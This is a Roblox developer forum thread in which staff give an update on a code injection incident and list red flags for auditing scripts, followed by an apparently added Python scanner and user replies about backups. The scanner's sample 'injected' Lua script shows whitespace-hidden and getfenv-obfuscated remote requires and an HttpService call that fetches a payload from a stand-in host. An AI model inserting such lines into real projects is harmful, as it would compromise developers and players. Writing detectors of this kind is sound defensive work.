Update on Code Injection Incident (9/7-9/8)

Hey Developers,

We want to provide you with the latest update regarding the code injection incident from Sept. 7-8 that we communicated to you a couple of weeks ago: Recent Roblox Security Incident.

Many of you asked what we are doing to lock down the servers and provide extra security measures in the future. At this time, the goal is to provide you with an update on what we’ve done to ensure improvements in the security of the games created by our developer community. Here are a couple of the actionable items we have addressed:

  • Completed a security audit of our infrastructure.
  • Deployed continual automated auditing and scanning of our systems.

We will continue to work through our security roadmap to mitigate potential security events in the future. Our priority is to continue providing open communication channels between our developer community and Roblox. In the future, if you have information for us about a security vulnerability, please reach out to us directly and our team will actively collaborate with you to address the incident.

The insecure server was addressed immediately upon discovery and we are continuing to address the systematic issues resulting from this. Here’s what we learned from the incident:

  • There were a handful of games that were confirmed with malicious code changes.
  • We’ve identified a pattern from these incidents that we have been applying to our filters and to other potential cases. If you have previously received an email from us regarding your place being potentially impacted, we highly encourage you to review your code and models carefully.
  • We are aware of a few cases where models were impacted by unexpected code changes. Please keep in mind the potential impact of malicious models. We highly encourage you to actively begin auditing the code in the models created by you or by others. We recommend that you review the code in your models for changes and, if you are not sure, revert to a version prior to Sept. 7.
  • Remember, you can see a version history of your models by configuring them. You will see a history at the bottom of the configure page that looks like this:

[image: version history shown at the bottom of the model's configure page]

Simply click on [ Make Current ] to switch your model back to an earlier version.

  • Along with your own models, we recommend checking out any models made by other developers. There are guidelines below you can use to keep an eye out for malicious code.
  • We are evaluating all reports related to this incident. If you discover any suspicious changes, please report those to us right away through devrelations@roblox.com so we can add those as part of the ongoing investigation on this incident.
  • We have and will continue to do everything we can to reduce the risk from this incident. We ask you to be proactive in inspecting your code and models and reporting anything suspicious to us.

When you investigate your code (either in your scripts or models), there are a couple of common patterns to look out for:

  • Insertion of arbitrary models, either with InsertService or require(). You should make sure you are aware of all the assets that are inserted into your game.
  • Lots of spaces. Sometimes a malicious coder will push their inserted text far to the right so it is not visible when simply scrolling through the file.
  • HttpService. You should be on the lookout for any web calls that are made to external services that you don’t have control over.
  • getfenv calls. Calls to various functions (such as the ones above) can be obfuscated using getfenv. Keep an eye out for any code that uses this function, particularly if the parameter that is passed in is long and complicated.

We want to assure you that we take incidents such as this one very seriously. We are actively working to close this particular issue and we will continue to look for other holes and exploits in the platform. Our goal is to make sure that we prevent as many issues as we can and to have quick and efficient response to issues we can’t prevent. The engagement level of our community is key to the success and security of our platform; therefore we highly encourage everyone to continue to report issues such as these directly to us. Please let us know if you have any further questions or concerns.

Thanks,
Developer Relations Team

36 Likes
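The review guidance above (compare against a copy saved before Sept. 7, and look for require/InsertService, hidden whitespace, HttpService and getfenv) can be turned into a quick offline scan. The following is an added example, not Roblox's own tooling or anything from the original post: it assumes you have the script source as text (copied out of Studio or extracted from a saved .rbxl) and optionally a known-good copy to diff against. The heuristics, asset IDs, URL and sample scripts are all constructed for illustration.

```python
"""Heuristic audit of Roblox Lua scripts for the red flags listed in the post.

Added example, not Roblox tooling. Assumes script source is available as text and,
optionally, a copy saved before the incident. All IDs, URLs and sample scripts
below are constructed for illustration.
"""
from __future__ import annotations

import difflib
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line: int     # 1-based line number in the scanned text
    rule: str     # which heuristic fired
    excerpt: str  # the suspicious text, whitespace collapsed and truncated


# Roblox API names are case-sensitive, so these patterns are too.
RULES = [
    # require(<numeric asset id>) fetches a ModuleScript from the catalogue at run
    # time; require(script.Parent.Config) is the normal local form and is not flagged.
    ("require_asset_id", re.compile(r"\brequire\s*\(\s*\d{3,}\s*\)")),
    ("insert_service", re.compile(r"\bInsertService\b")),
    ("http_service", re.compile(r"\bHttpService\b")),
    # getfenv alone is worth a look; getfenv()[...] indexed with a string built at
    # run time calls require/HttpService without the name appearing literally.
    ("getfenv", re.compile(r"\bgetfenv\b")),
    ("getfenv_indexed", re.compile(r"\bgetfenv\s*\([^)]*\)\s*\[")),
    # string.char(...) over a long list of numbers usually rebuilds a hidden string.
    ("string_char_blob", re.compile(r"\bstring\.char\s*\((?:\s*\d+\s*,){8,}")),
]


def _excerpt(text: str, limit: int = 60) -> str:
    text = " ".join(text.split())
    return text if len(text) <= limit else text[:limit] + "..."


def scan_source(source: str, min_pad: int = 120) -> list[Finding]:
    """Return every heuristic hit in `source`, one Finding per (line, rule, match)."""
    # "Lots of spaces": code pushed far enough right to be off-screen in the editor.
    hidden = re.compile(rf"\S[ \t]{{{min_pad},}}\S")
    findings: list[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        m = hidden.search(line)
        if m:
            findings.append(Finding(lineno, "hidden_by_whitespace", _excerpt(line[m.end() - 1:])))
        for rule, pattern in RULES:
            for m in pattern.finditer(line):
                findings.append(Finding(lineno, rule, _excerpt(line[m.start():])))
    return findings


def suspicious_lines(source: str) -> list[int]:
    return sorted({f.line for f in scan_source(source)})


def added_lines(known_good: str, current: str) -> list[tuple[int, str]]:
    """Lines in `current` that are not in `known_good`, numbered as in `current`."""
    cur = current.splitlines()
    matcher = difflib.SequenceMatcher(None, known_good.splitlines(), cur)
    out: list[tuple[int, str]] = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag in ("insert", "replace"):
            out.extend((j + 1, cur[j]) for j in range(j1, j2))
    return out


def scan_added(known_good: str, current: str) -> list[Finding]:
    """Run the heuristics only over lines that differ from the known-good copy."""
    return [Finding(lineno, f.rule, f.excerpt)
            for lineno, text in added_lines(known_good, current)
            for f in scan_source(text)]


# Constructed sample: a small script, then the same script with the kinds of
# insertions the post describes. None of the IDs or URLs are real.
CLEAN_SCRIPT = "\n".join([
    "-- LeaderboardHandler",
    'local Players = game:GetService("Players")',
    "local config = require(script.Parent.Config)",
    "Players.PlayerAdded:Connect(function(player)",
    '    print(player.Name .. " joined")',
    "end)",
])

INJECTED_SCRIPT = "\n".join([
    "-- LeaderboardHandler",
    'local Players = game:GetService("Players")',
    "local config = require(script.Parent.Config)",
    "Players.PlayerAdded:Connect(function(player)",
    '    print(player.Name .. " joined")',
    "end)" + " " * 300 + "require(123456789)",
    'getfenv()["re" .. "quire"](987654321)',
    'game:GetService("HttpService"):GetAsync("http://example.invalid/payload")',
    "local s = string.char(104, 116, 116, 112, 58, 47, 47, 101, 120)",
])

if __name__ == "__main__":
    for f in scan_added(CLEAN_SCRIPT, INJECTED_SCRIPT):
        print(f"line {f.line:>3}  {f.rule:<20}  {f.excerpt}")
```

Run it on a script and treat every hit as something to read by hand rather than as proof of compromise: a local require(script.Parent.Foo) is deliberately not flagged, while a numeric asset ID, a getfenv index built from concatenated strings, or a long string.char() list is almost always worth a closer look. When a pre-incident copy exists, scan_added narrows the review to the lines that actually changed.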

Yes! More security!

6 Likes

These are great!

3 Likes

This should make scanning for any malicious code easier, if reverting is out of the question (don’t know how it would be, but hey). Cheers for the update.

Pack your bags, we’re going hunting. :cool:

3 Likes

Thank you for following up on the incident. It is rather concerning that it happened but I am glad that you guys are on the case.

I strongly encourage anyone creating or working on a game in team create (or on a published place via Edit…) to close out all script windows and use File->Download a Copy… (TC) or Save As… (published place) diligently at the end of each day or major work effort. If multiple team members do the same, even better! rbxl files are tiny, and frequent, incrementally named local backups are worth the peace of mind.

3 Likes

You say that you know of some games that were confirmed to have malicious code changes. Were they confirmed because the developer found malicious code or did staff search for it with some automated tool?

1 Like

I beg to differ
[image]

I love to save every file as a new one in case something goes wrong. 33MB many times over is a lot lol.

Ha. I hope that’s a model repository or R.I.P. player load times :joy:

1 Like

Yep model repository. It was actually causing some of my players to be unable to play the game around the time of my internship because of unintended replication that was a huge pain to locate.

Bonus tip: Keep them in cloud storage like OneDrive. If your main laptop/desktop goes, you can still continue work.

2 Likes
